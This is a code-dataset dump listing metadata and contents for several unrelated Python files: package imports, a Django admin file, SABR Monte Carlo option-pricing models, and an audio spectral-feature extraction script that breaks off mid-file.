hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ec20433a7e0cd45d819304cb2359f472e8ae5d77
| 153
|
py
|
Python
|
UTKFace/UTKFace_64x64/cGAN-concat/models/__init__.py
|
asatk/improved_CcGAN
|
29a58e6e2a03e56c2ad80ae1a2ebbd0710e026f3
|
[
"MIT"
] | 1
|
2022-02-26T00:07:37.000Z
|
2022-02-26T00:07:37.000Z
|
UTKFace/UTKFace_64x64/cGAN-concat/models/__init__.py
|
asatk/improved_CcGAN
|
29a58e6e2a03e56c2ad80ae1a2ebbd0710e026f3
|
[
"MIT"
] | null | null | null |
UTKFace/UTKFace_64x64/cGAN-concat/models/__init__.py
|
asatk/improved_CcGAN
|
29a58e6e2a03e56c2ad80ae1a2ebbd0710e026f3
|
[
"MIT"
] | null | null | null |
from .DCGAN import *
from .SNGAN import *
from .ResNet_regre import *
from .ResNet_embed import *
from .ResNet_class import *
from .autoencoder import *
| 21.857143
| 27
| 0.764706
| 21
| 153
| 5.428571
| 0.428571
| 0.438596
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 153
| 6
| 28
| 25.5
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ec2313048745a9ce34c7da0e2f7ca68c14230a65
| 96
|
py
|
Python
|
models/incoming_phone_numbers.py
|
arfrank/Fake-Twilio-Api
|
3ed180d8ea81747f8afaba92af8f47e4397de480
|
[
"Unlicense"
] | 6
|
2015-06-22T19:32:08.000Z
|
2021-03-19T05:14:14.000Z
|
models/incoming_phone_numbers.py
|
arfrank/Fake-Twilio-Api
|
3ed180d8ea81747f8afaba92af8f47e4397de480
|
[
"Unlicense"
] | null | null | null |
models/incoming_phone_numbers.py
|
arfrank/Fake-Twilio-Api
|
3ed180d8ea81747f8afaba92af8f47e4397de480
|
[
"Unlicense"
] | 2
|
2016-04-13T14:44:32.000Z
|
2021-04-12T14:41:24.000Z
|
from models import phone_numbers
class Incoming_Phone_Number(phone_numbers.Phone_Number):
pass
| 24
| 56
| 0.875
| 14
| 96
| 5.642857
| 0.642857
| 0.303797
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 96
| 4
| 57
| 24
| 0.897727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
6b705b80ae29068fa04c256314281b4c59a227b2
| 8,072
|
py
|
Python
|
py/HW3/option_models/sabr.py
|
cy-wang15/ASP
|
68a512fbbe0a36feab7eaee5118ea815ec0444de
|
[
"MIT"
] | 1
|
2021-05-17T02:17:54.000Z
|
2021-05-17T02:17:54.000Z
|
py/HW3/option_models/sabr.py
|
cy-wang15/ASP
|
68a512fbbe0a36feab7eaee5118ea815ec0444de
|
[
"MIT"
] | null | null | null |
py/HW3/option_models/sabr.py
|
cy-wang15/ASP
|
68a512fbbe0a36feab7eaee5118ea815ec0444de
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 10
@author: jaehyuk
"""
import numpy as np
import scipy.stats as ss
import scipy.optimize as sopt
from . import normal
from . import bsm
import pyfeng as pf
'''
MC model class for Beta=1
'''
class ModelBsmMC:
beta = 1.0 # fixed (not used)
vov, rho = 0.0, 0.0
sigma, intr, divr = None, None, None
bsm_model = None
'''
You may define more members for MC: time step, etc
'''
def __init__(self, sigma, vov=0, rho=0.0, beta=1.0, intr=0, divr=0):
self.sigma = sigma
self.vov = vov
self.rho = rho
self.intr = intr
self.divr = divr
self.bsm_model = pf.Bsm(sigma, intr=intr, divr=divr)
def bsm_vol(self, strike, spot, texp=None, sigma=None):
''''
From the price from self.price() compute the implied vol
this is the opposite of bsm_vol in ModelHagan class
use bsm_model
'''
return 0
def price(self, strike, spot, texp=None, sigma=None, cp=1):
'''
Your MC routine goes here
Generate paths for vol and price first. Then get prices (vector) for all strikes
You may fix the random number seed
'''
sigma = self.sigma
vov = self.vov
rho = self.rho
nstep = 600
npath = 10000
dt = texp / nstep
cor = np.array([[1,rho],[rho,1]])
cov = cor
chol = np.linalg.cholesky(cov)
log_St = np.log(spot) * np.ones((nstep+1, npath))
vol = sigma * np.ones((nstep+1, npath))
strike_m = strike[:,None] * np.ones((strike.size, npath))
for k in range(0, nstep):
z = np.random.normal(loc=0,scale=1,size=[2, npath])
z_corr = chol @ z
log_St[k + 1, :] = log_St[k, :] + vol[k,:] * np.sqrt(dt) * z_corr[0,:] - 1/2 * dt * vol[k,:]**2
vol[k+1, :] = vol[k, :] * np.exp(vov * np.sqrt(dt) * z_corr[1,:]-1/2 * (vov**2)*dt)
St = np.exp(log_St)
price = np.mean( np.fmax(cp*(St[-1,:] - strike_m), 0),axis=1 )
sim_var = np.var( np.fmax(cp*(St[-1,:] - strike_m), 0),axis=1 )
self.sim_var = sim_var
return price
'''
MC model class for Beta=0
'''
class ModelNormalMC:
beta = 0.0 # fixed (not used)
vov, rho = 0.0, 0.0
sigma, intr, divr = None, None, None
normal_model = None
def __init__(self, sigma, vov=0, rho=0.0, beta=0.0, intr=0, divr=0):
self.sigma = sigma
self.vov = vov
self.rho = rho
self.intr = intr
self.divr = divr
self.normal_model = pf.Norm(sigma, intr=intr, divr=divr)
def norm_vol(self, strike, spot, texp=None, sigma=None):
''''
From the price from self.price() compute the implied vol
this is the opposite of normal_vol in ModelNormalHagan class
use normal_model
'''
return 0
def price(self, strike, spot, texp=None, sigma=None, cp=1):
'''
Your MC routine goes here
Generate paths for vol and price first. Then get prices (vector) for all strikes
You may fix the random number seed
'''
rho = self.rho
vov = self.vov
sigma = self.sigma
nstep = 600
npath = 10000
dt = texp / nstep
cor = np.array([[1,rho],[rho,1]])
cov = cor
chol = np.linalg.cholesky(cov)
St = spot * np.ones((nstep+1, npath))
vol = sigma * np.ones((nstep+1, npath))
strike_m = strike[:,None] * np.ones((strike.size, npath))
for k in range(0, nstep):
z = np.random.normal(loc=0,scale=1,size=[2, npath])
z_corr = chol @ z
St[k + 1, :] = St[k, :] + vol[k,:] * np.sqrt(dt) * z_corr[0,:]
vol[k+1, :] = vol[k, :] * np.exp(vov * np.sqrt(dt) * z_corr[1,:] - 0.5 * (vov**2)*dt)
price = np.mean( np.fmax(cp*(St[-1,:] - strike_m), 0), axis=1 )
sim_var = np.var( np.fmax(cp*(St[-1,:] - strike_m), 0), axis=1 )
self.sim_var = sim_var
return price
'''
Conditional MC model class for Beta=1
'''
class ModelBsmCondMC:
beta = 1.0 # fixed (not used)
vov, rho = 0.0, 0.0
sigma, intr, divr = None, None, None
bsm_model = None
'''
You may define more members for MC: time step, etc
'''
def __init__(self, sigma, vov=0, rho=0.0, beta=1.0, intr=0, divr=0):
self.sigma = sigma
self.vov = vov
self.rho = rho
self.intr = intr
self.divr = divr
self.bsm_model = pf.Bsm(sigma, intr=intr, divr=divr)
def bsm_vol(self, strike, spot, texp=None):
''''
From the price from self.price() compute the implied vol
this is the opposite of bsm_vol in ModelHagan class
use bsm_model
should be same as bsm_vol method in ModelBsmMC (just copy & paste)
'''
return 0
def price(self, strike, spot, texp=None, cp=1):
'''
Your MC routine goes here
Generate paths for vol only. Then compute integrated variance and BSM price.
Then get prices (vector) for all strikes
You may fix the random number seed
'''
nstep = 100
npath = 10000
dt = texp/nstep
sigma = self.sigma
vov = self.vov
rho = self.rho
vol = sigma * np.ones([nstep+1, npath])
for i in range(nstep):
z = np.random.randn(npath)
vol[i+1,:] = vol[i,:] * np.exp(vov * np.sqrt(dt) * z-1/2 * (vov**2)*dt)
var = vol ** 2 / sigma**2
IT = var.mean(axis=0)
spot_BS = spot * np.exp(rho*(vol[-1,:]-vol[0,:]) - 0.5* (rho*sigma)**2 *texp*IT)
vol_BS = sigma * np.sqrt((1-rho**2)*IT)
price = []
sim_var = []
for k in strike:
price_onpaths = bsm.price(k, spot_BS, texp, vol_BS)
sim_var.append(price_onpaths.var())
price.append(price_onpaths.mean())
self.sim_var = sim_var
return price
'''
Conditional MC model class for Beta=0
'''
class ModelNormalCondMC:
beta = 0.0 # fixed (not used)
vov, rho = 0.0, 0.0
sigma, intr, divr = None, None, None
normal_model = None
def __init__(self, sigma, vov=0, rho=0.0, beta=0.0, intr=0, divr=0):
self.sigma = sigma
self.vov = vov
self.rho = rho
self.intr = intr
self.divr = divr
self.normal_model = pf.Norm(sigma, intr=intr, divr=divr)
def norm_vol(self, strike, spot, texp=None):
''''
From the price from self.price() compute the implied vol
this is the opposite of normal_vol in ModelNormalHagan class
use normal_model
should be same as norm_vol method in ModelNormalMC (just copy & paste)
'''
return 0
def price(self, strike, spot, texp=None, cp=1):
'''
Your MC routine goes here
Generate paths for vol only. Then compute integrated variance and normal price.
You may fix the random number seed
'''
nstep = 100
npath = 10000
dt = texp/nstep
sigma = self.sigma
vov = self.vov
rho = self.rho
vol = sigma * np.ones([nstep+1, npath])
for i in range(nstep):
z = np.random.randn(npath)
vol[i+1,:] = vol[i,:] * np.exp(vov * np.sqrt(dt) * z-1/2 * (vov**2)*dt)
var = vol ** 2 / sigma**2
IT = var.mean(axis=0)
spot_N = spot + rho/vov * (vol[-1,:]-vol[0,:])
vol_N = sigma * np.sqrt((1-rho**2)*IT)
price = []
sim_var = []
for k in strike:
price_onpaths = normal.price(k, spot_N, texp, vol_N)
sim_var.append(price_onpaths.var())
price.append(price_onpaths.mean())
self.sim_var = sim_var
return price
| 31.40856
| 108
| 0.52837
| 1,173
| 8,072
| 3.56607
| 0.121057
| 0.010041
| 0.009563
| 0.034425
| 0.886445
| 0.877839
| 0.877839
| 0.863017
| 0.863017
| 0.854889
| 0
| 0.032209
| 0.342294
| 8,072
| 257
| 109
| 31.40856
| 0.755698
| 0.173067
| 0
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078431
| false
| 0
| 0.039216
| 0
| 0.248366
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6bc54f40c2131aad1358e1eb757d91b6d775197f
| 134
|
py
|
Python
|
src/github_secret_finder/core/github/__init__.py
|
gsoft-inc/github-secret-finder
|
07e85fbc84773dfe9e921d2e7a3c0372cb936177
|
[
"Apache-2.0"
] | 4
|
2019-10-22T20:03:41.000Z
|
2020-11-18T18:00:56.000Z
|
src/github_secret_finder/core/github/__init__.py
|
mlefebvre/github-secret-finder
|
07e85fbc84773dfe9e921d2e7a3c0372cb936177
|
[
"Apache-2.0"
] | null | null | null |
src/github_secret_finder/core/github/__init__.py
|
mlefebvre/github-secret-finder
|
07e85fbc84773dfe9e921d2e7a3c0372cb936177
|
[
"Apache-2.0"
] | 1
|
2021-03-30T16:28:57.000Z
|
2021-03-30T16:28:57.000Z
|
from .github_api_client import GithubApiClient
from .github_search_client import GithubSearchClient
from .github_api import GithubApi
| 33.5
| 52
| 0.88806
| 17
| 134
| 6.705882
| 0.529412
| 0.263158
| 0.22807
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089552
| 134
| 3
| 53
| 44.666667
| 0.934426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6bec6aab35d861c939c924fbb9a36f93c94e9e3e
| 132
|
py
|
Python
|
knx_stack/encode/usb_hid/report_header/__init__.py
|
majamassarini/knx-stack
|
11a9baac6b7600649b5fbca43c93b200b23676b4
|
[
"MIT"
] | 2
|
2021-07-28T07:42:28.000Z
|
2022-01-25T18:56:05.000Z
|
knx_stack/encode/usb_hid/report_header/__init__.py
|
majamassarini/knx-stack
|
11a9baac6b7600649b5fbca43c93b200b23676b4
|
[
"MIT"
] | 6
|
2021-07-25T21:36:01.000Z
|
2022-02-20T21:11:31.000Z
|
knx_stack/encode/usb_hid/report_header/__init__.py
|
majamassarini/knx-stack
|
11a9baac6b7600649b5fbca43c93b200b23676b4
|
[
"MIT"
] | null | null | null |
from knx_stack.encode.usb_hid.report_header import packet_info
from knx_stack.encode.usb_hid.report_header import report_identifier
| 44
| 68
| 0.893939
| 22
| 132
| 5
| 0.545455
| 0.127273
| 0.218182
| 0.327273
| 0.763636
| 0.763636
| 0.763636
| 0.763636
| 0.763636
| 0
| 0
| 0
| 0.060606
| 132
| 2
| 69
| 66
| 0.887097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
6bf6833625ae8761aa0f49774275623e8016045e
| 164
|
py
|
Python
|
api/admin.py
|
smtr42/p13_atmosberry2
|
9fde605ad32c72741657ef2ae7a939966664b769
|
[
"MIT"
] | null | null | null |
api/admin.py
|
smtr42/p13_atmosberry2
|
9fde605ad32c72741657ef2ae7a939966664b769
|
[
"MIT"
] | null | null | null |
api/admin.py
|
smtr42/p13_atmosberry2
|
9fde605ad32c72741657ef2ae7a939966664b769
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Address, Device, Sensor
admin.site.register(Sensor)
admin.site.register(Address)
admin.site.register(Device)
| 20.5
| 43
| 0.810976
| 23
| 164
| 5.782609
| 0.478261
| 0.203008
| 0.383459
| 0.345865
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091463
| 164
| 7
| 44
| 23.428571
| 0.892617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6bf7e11cb213d94cb972352ff9ffc027d5f710ea
| 31,086
|
py
|
Python
|
read_xml_all/calcul_matrix_je_le_qui_dans_de_192_matrix_try1.py
|
daniel20162016/my-first
|
f9554dd476302b26e8a296393025f150922f349c
|
[
"MIT"
] | null | null | null |
read_xml_all/calcul_matrix_je_le_qui_dans_de_192_matrix_try1.py
|
daniel20162016/my-first
|
f9554dd476302b26e8a296393025f150922f349c
|
[
"MIT"
] | null | null | null |
read_xml_all/calcul_matrix_je_le_qui_dans_de_192_matrix_try1.py
|
daniel20162016/my-first
|
f9554dd476302b26e8a296393025f150922f349c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 31 15:45:22 2016
@author: wang
"""
#from matplotlib import pylab as plt
#from numpy import fft, fromstring, int16, linspace
#import wave
from read_wav_xml_good_1 import*
from matrix_24_2 import*
from max_matrix_norm import*
import numpy as np
# open a wave file
filename = 'francois_filon_pure_1.wav'
filename_1 ='francois_filon_pure_1.xml'
word ='je'
word_2='le'
word_3='qui'
word_4='dans'
word_5='de'
#==============================================================================
# this is the parti for the 'je' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
je_1 = matrix_all_step_new_1
je_2 = matrix_all_step_new_2
je_3 = matrix_all_step_new_3
je_4 = matrix_all_step_new_4
je_5 = matrix_all_step_new_5
#==============================================================================
# # this is the parti for the 'je' end
#==============================================================================
#np.savez('je_le_qui_dans_de_192_matrix.npz',matrix_all_step_new_1,matrix_all_step_new_2,matrix_all_step_new_3,matrix_all_step_new_4,matrix_all_step_new_5)
#==============================================================================
# this is the parti for the 'le' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_2)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
